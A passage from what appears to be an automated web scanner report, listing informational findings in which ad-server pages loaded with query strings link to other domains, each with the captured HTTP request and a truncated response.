<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
3A%2F%2Fwww.atalasoft.com%2Fphotofree%3Futm_source%3Dmsdnmagazine%26utm_medium%3Dbanner%26utm_term%3DfreeSDK%26utm_content%3DgollyFreeSDK-300x250%26utm_campaign%3Ddotimage-banner-MSDN' target='_blank'><img src='http://i.xx.openx.com/a2c/a2c69e1d758a56c7cc2fde09a37e7991e8bc1c2f/4be/4bed8490c6a24ab7c45182a3bb7d2b60.gif' width='300' height='250' alt='Advertisement' title='Advertisement' border='0' /></a>
...[SNIP]...

18.63. http://d.101m3.com/afr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.101m3.com
Path:	/afr.php

Issue detail

The page was loaded from a URL containing a query string:

http://d.101m3.com/afr.php?zoneid=4&cb=INSERT_RANDOM_NUMBER_HERE

The response contains the following link to another domain:

http://i.xx.openx.com/a2c/a2c69e1d758a56c7cc2fde09a37e7991e8bc1c2f/62d/62df7818fc49ba948b9201c0fba6b26c.gif

Request

GET /afr.php?zoneid=4&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.101m3.com
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/magazine/ee336135.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 02:07:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=b27bc7b6d7ff12decb51afccaa9f7de4; expires=Sun, 22-Jul-2012 02:07:44 GMT; path=/
Content-Length: 1210
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
m/ck.php?oaparams=2__bannerid=332__zoneid=4__cb=f282adaeb0__r_id=6cf976f679a2581542daa7ba16e5d250__r_ts=lorkkw__oadest=http%3A%2F%2Fwww.aspose.com%2Fadtracker%2F%3Fcode%3D221455101110' target='_blank'><img src='http://i.xx.openx.com/a2c/a2c69e1d758a56c7cc2fde09a37e7991e8bc1c2f/62d/62df7818fc49ba948b9201c0fba6b26c.gif' width='728' height='90' alt='Advertisement' title='Advertisement' border='0' /></a>
...[SNIP]...

18.64. http://d.101m3.com/afr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.101m3.com
Path:	/afr.php

Issue detail

The page was loaded from a URL containing a query string:

http://d.101m3.com/afr.php?zoneid=3&cb=INSERT_RANDOM_NUMBER_HERE

The response contains the following link to another domain:

http://i.xx.openx.com/a2c/a2c69e1d758a56c7cc2fde09a37e7991e8bc1c2f/984/984bcd23ec745098121b46ec537240a3.jpg

Request

GET /afr.php?zoneid=3&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.101m3.com
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/magazine/ee336135.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 02:08:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=b27bc7b6d7ff12decb51afccaa9f7de4; expires=Sun, 22-Jul-2012 02:08:06 GMT; path=/
Content-Length: 1211
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
m/ck.php?oaparams=2__bannerid=279__zoneid=3__cb=2f1d28c0c8__r_id=a6cc1d74e5e069bba9b8c029af2a5cdf__r_ts=lorkli__oadest=http%3A%2F%2Fvisualstudiomagazine.com%2Farticles%2Flist%2Fc.aspx' target='_blank'><img src='http://i.xx.openx.com/a2c/a2c69e1d758a56c7cc2fde09a37e7991e8bc1c2f/984/984bcd23ec745098121b46ec537240a3.jpg' width='300' height='250' alt='Advertisement' title='Advertisement' border='0' /></a>
...[SNIP]...

18.65. http://dg.specificclick.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dg.specificclick.net
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://dg.specificclick.net/?y=3&t=h&u=http%3A%2F%2Fwww.treehugger.com%2Fscience_technology%2F%3Fcampaign%3Dth_nav_scitech&r=http%3A%2F%2Fwww.treehugger.com%2Ftravel_nature%2F%3Fcampaign%3Dth_nav_travel

The response contains the following link to another domain:

http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1

Request

Response

18.66. http://dinclinx.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dinclinx.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://dinclinx.com/?s=103&e=0&t=21&f=javascript

The response contains the following links to other domains:

http://clk.madisonlogic.com/clk?pub=18&pgr=10&src=103&ctg=15&tgt=21&tstamp=20110722T201314&ast=12247&cmp=3034&crv=10839&pos=3&frm=235
http://clk.madisonlogic.com/clk?pub=18&pgr=10&src=103&ctg=15&tgt=21&tstamp=20110722T201314&ast=13516&cmp=3349&crv=12122&pos=4&frm=235
http://clk.madisonlogic.com/clk?pub=18&pgr=10&src=103&ctg=15&tgt=21&tstamp=20110722T201314&ast=13838&cmp=3418&crv=12450&pos=5&frm=235
http://clk.madisonlogic.com/clk?pub=18&pgr=10&src=103&ctg=15&tgt=21&tstamp=20110722T201314&ast=14170&cmp=3531&crv=12785&pos=2&frm=235
http://clk.madisonlogic.com/clk?pub=18&pgr=10&src=103&ctg=15&tgt=21&tstamp=20110722T201314&ast=14287&cmp=3408&crv=12903&pos=1&frm=235
http://st.madisonlogic.com/images/userlogo/2/2361_brainloop_logo.gif
http://st.madisonlogic.com/images/userlogo/3/3269_SC-onlineLOGO.gif
http://st.madisonlogic.com/images/userlogo/3/3326_Corero_Logo.jpg
http://st.madisonlogic.com/images/userlogo/3/3339_CREDANT_New_Logo_CMYK.jpg
http://st.madisonlogic.com/images/userlogo/3/3430_GFI_logo.GIF
http://whitepapers.scmagazineus.com/index.php?srcid=1190

Request

GET /?s=103&e=0&t=21&f=javascript HTTP/1.1
Host: dinclinx.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 22 Jul 2011 20:13:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 22 Jul 2011 20:13:14 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 7961

document.write('<table cellspacing="0" style="background-color: #ffffff; border: 1px solid #CBCBCB; border-collapse: collapse;"> <tr> <td height="19" colspan="2" style="font:bold 13px Arial,He
...[SNIP]...
<p style="font-size:8.5pt;font-family:Verdana; padding-top:5px"> <a href="http://clk.madisonlogic.com/clk?pub=18&pgr=10&src=103&ctg=15&tgt=21&tstamp=20110722T201314&ast=14287&cmp=3408&crv=12903&pos=1&frm=235" style="font: bold 11px Arial,Helvetica,sans-serif; text-decoration: none; color: #0070ac; font-size:9.0pt; " " onmouseover="this.style.textDecoration = \'underline\';this.style.color = \'#7e939e\';" onmouseout="this.style.textDecoration = \'none\';this.style.color = \'#0070ac\';"> Guide to Using Network Intrusion Prevention Systems: </a>
...[SNIP]...
<td style="width:80px; padding:10px 0px 0px 0px; border-bottom:1px dotted #cccccc;"> <a href="http://clk.madisonlogic.com/clk?pub=18&pgr=10&src=103&ctg=15&tgt=21&tstamp=20110722T201314&ast=14287&cmp=3408&crv=12903&pos=1&frm=235" target="_blank" style="text-decoration: none;text-align: right"><font face="Verdana"><img border="0" width="80" src="http://st.madisonlogic.com/images/userlogo/3/3326_Corero_Logo.jpg"></a>
...[SNIP]...
<p style="font-size:8.5pt;font-family:Verdana; padding-top:5px"> <a href="http://clk.madisonlogic.com/clk?pub=18&pgr=10&src=103&ctg=15&tgt=21&tstamp=20110722T201314&ast=14170&cmp=3531&crv=12785&pos=2&frm=235" style="font: bold 11px Arial,Helvetica,sans-serif; text-decoration: none; color: #0070ac; font-size:9.0pt; " " onmouseover="this.style.textDecoration = \'underline\';this.style.color = \'#7e939e\';" onmouseout="this.style.textDecoration = \'none\';this.style.color = \'#0070ac\';"> Security Considerations for Small and Medium-Sized Enterprises (SMEs): </a>
...[SNIP]...
<td style="width:80px; padding:10px 0px 0px 0px; border-bottom:1px dotted #cccccc;"> <a href="http://clk.madisonlogic.com/clk?pub=18&pgr=10&src=103&ctg=15&tgt=21&tstamp=20110722T201314&ast=14170&cmp=3531&crv=12785&pos=2&frm=235" target="_blank" style="text-decoration: none;text-align: right"><font face="Verdana"><img border="0" width="80" src="http://st.madisonlogic.com/images/userlogo/3/3430_GFI_logo.GIF"></a>
...[SNIP]...
<p style="font-size:8.5pt;font-family:Verdana; padding-top:5px"> <a href="http://clk.madisonlogic.com/clk?pub=18&pgr=10&src=103&ctg=15&tgt=21&tstamp=20110722T201314&ast=12247&cmp=3034&crv=10839&pos=3&frm=235" style="font: bold 11px Arial,Helvetica,sans-serif; text-decoration: none; color: #0070ac; font-size:9.0pt; " " onmouseover="this.style.textDecoration = \'underline\';this.style.color = \'#7e939e\';" onmouseout="this.style.textDecoration = \'none\';this.style.color = \'#0070ac\';"> After WikiLeaks, what\'s next for document compliance management?: </a>
...[SNIP]...
<td style="width:80px; padding:10px 0px 0px 0px; border-bottom:1px dotted #cccccc;"> <a href="http://clk.madisonlogic.com/clk?pub=18&pgr=10&src=103&ctg=15&tgt=21&tstamp=20110722T201314&ast=12247&cmp=3034&crv=10839&pos=3&frm=235" target="_blank" style="text-decoration: none;text-align: right"><font face="Verdana"><img border="0" width="80" src="http://st.madisonlogic.com/images/userlogo/2/2361_brainloop_logo.gif"></a>
...[SNIP]...
<p style="font-size:8.5pt;font-family:Verdana; padding-top:5px"> <a href="http://clk.madisonlogic.com/clk?pub=18&pgr=10&src=103&ctg=15&tgt=21&tstamp=20110722T201314&ast=13516&cmp=3349&crv=12122&pos=4&frm=235" style="font: bold 11px Arial,Helvetica,sans-serif; text-decoration: none; color: #0070ac; font-size:9.0pt; " " onmouseover="this.style.textDecoration = \'underline\';this.style.color = \'#7e939e\';" onmouseout="this.style.textDecoration = \'none\';this.style.color = \'#0070ac\';"> Shining the "Spotlight" on mobile security: </a>
...[SNIP]...
<td style="width:80px; padding:10px 0px 0px 0px; border-bottom:1px dotted #cccccc;"> <a href="http://clk.madisonlogic.com/clk?pub=18&pgr=10&src=103&ctg=15&tgt=21&tstamp=20110722T201314&ast=13516&cmp=3349&crv=12122&pos=4&frm=235" target="_blank" style="text-decoration: none;text-align: right"><font face="Verdana"><img border="0" width="80" src="http://st.madisonlogic.com/images/userlogo/3/3269_SC-onlineLOGO.gif"></a>
...[SNIP]...
<p style="font-size:8.5pt;font-family:Verdana; padding-top:5px"> <a href="http://clk.madisonlogic.com/clk?pub=18&pgr=10&src=103&ctg=15&tgt=21&tstamp=20110722T201314&ast=13838&cmp=3418&crv=12450&pos=5&frm=235" style="font: bold 11px Arial,Helvetica,sans-serif; text-decoration: none; color: #0070ac; font-size:9.0pt; " " onmouseover="this.style.textDecoration = \'underline\';this.style.color = \'#7e939e\';" onmouseout="this.style.textDecoration = \'none\';this.style.color = \'#0070ac\';"> Removable Media Security for Healthcare Organizations: </a>
...[SNIP]...
<td style="width:80px; padding:10px 0px 0px 0px; border-bottom:1px dotted #cccccc;"> <a href="http://clk.madisonlogic.com/clk?pub=18&pgr=10&src=103&ctg=15&tgt=21&tstamp=20110722T201314&ast=13838&cmp=3418&crv=12450&pos=5&frm=235" target="_blank" style="text-decoration: none;text-align: right"><font face="Verdana"><img border="0" width="80" src="http://st.madisonlogic.com/images/userlogo/3/3339_CREDANT_New_Logo_CMYK.jpg"></a>
...[SNIP]...
<td style="font: italic 11px Arial,Helvetica,sans-serif; color: #003366; text-align: Right; padding: 0.2em;" colspan="2"> <a href="http://whitepapers.SCMagazineUS.com/index.php?srcid=1190" style="font: italic 11px Verdana,Arial,Helvetica,sans-serif; color: #638090;"> View More Research </a>
...[SNIP]...

18.67. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7268992780839433&output=html&h=600&slotname=0018455936&w=160&ea=0&flash=0&url=http%3A%2F%2Fwww.lifescript.com%2FHealth%2FConditions%2FADD%2FDoctor-Recommended_Tips_for_Women_with_ADHD.aspx&dt=1311276275849&bpp=33&shv=r20110713&jsv=r20110719&correlator=1311276277026&frm=7&adk=399869954&ga_vid=274049985.1311276131&ga_sid=1311276131&ga_hid=713524709&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=4&u_nmime=36&biw=1023&bih=733&ifk=1887371661&eid=33895163&fu=4&ifi=1&dtd=1184

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.lifescript.com/Health/Conditions/ADD/Doctor-Recommended_Tips_for_Women_with_ADHD.aspx%26hl%3Den%26client%3Dca-pub-7268992780839433%26adU%3Dmantecathyroiddoc.com%26adT%3DSymptoms%2Bof%2BLow%2BThyroid%253F%26adU%3Dwww.focusonadhd.com%26adT%3DADHD%2BIn%2BAdults%26adU%3DHealthyNow.com%26adT%3DCommon%2BDepression%2BSigns%26adU%3DRESPeRATE.com%26adT%3DI%2BHad%2BHigh%2BBlood%2BPressure%26adU%3DHaveTheRelationshipYouWant.com%26adT%3DMake%2BHim%2BAddicted%2BTo%2BYou%26gl%3DUS&usg=AFQjCNGlMQWZpEmtLKKGMwxQGXhXNCPDyA

Request

GET /pagead/ads?client=ca-pub-7268992780839433&output=html&h=600&slotname=0018455936&w=160&ea=0&flash=0&url=http%3A%2F%2Fwww.lifescript.com%2FHealth%2FConditions%2FADD%2FDoctor-Recommended_Tips_for_Women_with_ADHD.aspx&dt=1311276275849&bpp=33&shv=r20110713&jsv=r20110719&correlator=1311276277026&frm=7&adk=399869954&ga_vid=274049985.1311276131&ga_sid=1311276131&ga_hid=713524709&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=4&u_nmime=36&biw=1023&bih=733&ifk=1887371661&eid=33895163&fu=4&ifi=1&dtd=1184 HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;abr=!webtvs;tax=adhd_adult;tax=adhd;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;pos=1;tile=2;sz=160x600;ord=109374225633552
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 21 Jul 2011 19:24:32 GMT
Server: cafe
Cache-Control: private
Content-Length: 14389
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#6699cc}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="left:2px;position:absolute;top:1px"><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.lifescript.com/Health/Conditions/ADD/Doctor-Recommended_Tips_for_Women_with_ADHD.aspx%26hl%3Den%26client%3Dca-pub-7268992780839433%26adU%3Dmantecathyroiddoc.com%26adT%3DSymptoms%2Bof%2BLow%2BThyroid%253F%26adU%3Dwww.focusonadhd.com%26adT%3DADHD%2BIn%2BAdults%26adU%3DHealthyNow.com%26adT%3DCommon%2BDepression%2BSigns%26adU%3DRESPeRATE.com%26adT%3DI%2BHad%2BHigh%2BBlood%2BPressure%26adU%3DHaveTheRelationshipYouWant.com%26adT%3DMake%2BHim%2BAddicted%2BTo%2BYou%26gl%3DUS&usg=AFQjCNGlMQWZpEmtLKKGMwxQGXhXNCPDyA" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

18.68. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7268992780839433&output=html&h=600&slotname=0018455936&w=160&ea=0&flash=0&url=http%3A%2F%2Fwww.lifescript.com%2FHealth%2FConditions%2FADD%2FOut_of_Control_It_Could_Be_ADHD.aspx&dt=1311276275454&bpp=32&shv=r20110713&jsv=r20110719&correlator=1311276276979&frm=7&adk=399869954&ga_vid=274049985.1311276131&ga_sid=1311276131&ga_hid=999484152&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=4&u_nmime=36&biw=1023&bih=706&ifk=129068866&eid=36813005%2C33895162&fu=4&ifi=1&dtd=M

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx%26hl%3Den%26client%3Dca-pub-7268992780839433%26adU%3Dwww.focusonadhd.com%26adT%3DADHD%2BIn%2BAdults%26adU%3Dwww.health.com%26adT%3DTreatment%2BOf%2BAdult%2BADHD%26adU%3DSynaptol.com/Adult-ADHD%26adT%3DAdult%2BADHD%2BSymptom%2BRelief%26adU%3DNaturalWellBeing.com/ADD-Treatment%26adT%3DSay%2Bgoodbye%2Bto%2Byour%2BADD%26adU%3Dneurology.justanswer.com%26adT%3DAsk%2Ba%2BNeurologist%2BOnline%26gl%3DUS&usg=AFQjCNHbybLB-7DQaDWvzLZs6XkI89ocJA

Request

GET /pagead/ads?client=ca-pub-7268992780839433&output=html&h=600&slotname=0018455936&w=160&ea=0&flash=0&url=http%3A%2F%2Fwww.lifescript.com%2FHealth%2FConditions%2FADD%2FOut_of_Control_It_Could_Be_ADHD.aspx&dt=1311276275454&bpp=32&shv=r20110713&jsv=r20110719&correlator=1311276276979&frm=7&adk=399869954&ga_vid=274049985.1311276131&ga_sid=1311276131&ga_hid=999484152&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=4&u_nmime=36&biw=1023&bih=706&ifk=129068866&eid=36813005%2C33895162&fu=4&ifi=1&dtd=M HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;abr=!webtvs;tax=adhd_adult;tax=adhd;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;tile=2;sz=160x600;ord=716199259245381
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 21 Jul 2011 19:24:40 GMT
Server: cafe
Cache-Control: private
Content-Length: 14596
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#6699cc}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="left:2px;position:absolute;top:1px"><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx%26hl%3Den%26client%3Dca-pub-7268992780839433%26adU%3Dwww.focusonadhd.com%26adT%3DADHD%2BIn%2BAdults%26adU%3Dwww.health.com%26adT%3DTreatment%2BOf%2BAdult%2BADHD%26adU%3DSynaptol.com/Adult-ADHD%26adT%3DAdult%2BADHD%2BSymptom%2BRelief%26adU%3DNaturalWellBeing.com/ADD-Treatment%26adT%3DSay%2Bgoodbye%2Bto%2Byour%2BADD%26adU%3Dneurology.justanswer.com%26adT%3DAsk%2Ba%2BNeurologist%2BOnline%26gl%3DUS&usg=AFQjCNHbybLB-7DQaDWvzLZs6XkI89ocJA" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

18.69. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7268992780839433&output=html&h=600&slotname=0018455936&w=160&ea=0&flash=0&url=http%3A%2F%2Fwww.lifescript.com%2FHealth%2FConditions%2FADD%2FHow_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%3Futm_source%3Doutbrain%26utm_medium%3Dcpc%26utm_campaign%3DADHD_Adult&dt=1311276274923&bpp=36&shv=r20110713&jsv=r20110719&correlator=1311276276932&frm=7&adk=399869954&ga_vid=274049985.1311276131&ga_sid=1311276131&ga_hid=1090051965&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=4&u_nmime=36&biw=1023&bih=706&ifk=1021502957&fu=4&ifi=1&dtd=M

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%253Futm_source%253Doutbrain%2526utm_medium%253Dcpc%2526utm_campaign%253DADHD_Adult%26hl%3Den%26client%3Dca-pub-7268992780839433%26adU%3DMedicalOptionsHere.org%26adT%3DIdentify%2BADHD%2BSymptoms%26adU%3Dwww.TreatAdultAsthma.com%26adT%3DAsthma%2BSigns%2B%2526amp%253B%2BSymptoms%26adU%3DHealth.JustAnswer.com/Psychiatry%26adT%3DAsk%2Ba%2BPsychiatrist%2BOnline%26adU%3DDisabilityGroup.com%26adT%3DAdult%2BAdhd%2BBenefits%26adU%3Dwww.Allsup.com%26adT%3DBipolar%2BDisability%26gl%3DUS&usg=AFQjCNEaGheP4U0w0vkNFeI1fBTbjL7HmQ

Request

GET /pagead/ads?client=ca-pub-7268992780839433&output=html&h=600&slotname=0018455936&w=160&ea=0&flash=0&url=http%3A%2F%2Fwww.lifescript.com%2FHealth%2FConditions%2FADD%2FHow_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%3Futm_source%3Doutbrain%26utm_medium%3Dcpc%26utm_campaign%3DADHD_Adult&dt=1311276274923&bpp=36&shv=r20110713&jsv=r20110719&correlator=1311276276932&frm=7&adk=399869954&ga_vid=274049985.1311276131&ga_sid=1311276131&ga_hid=1090051965&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=4&u_nmime=36&biw=1023&bih=706&ifk=1021502957&fu=4&ifi=1&dtd=M HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;tile=2;sz=160x600;ord=101352252258050
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 21 Jul 2011 19:24:40 GMT
Server: cafe
Cache-Control: private
Content-Length: 15565
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#6699cc}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
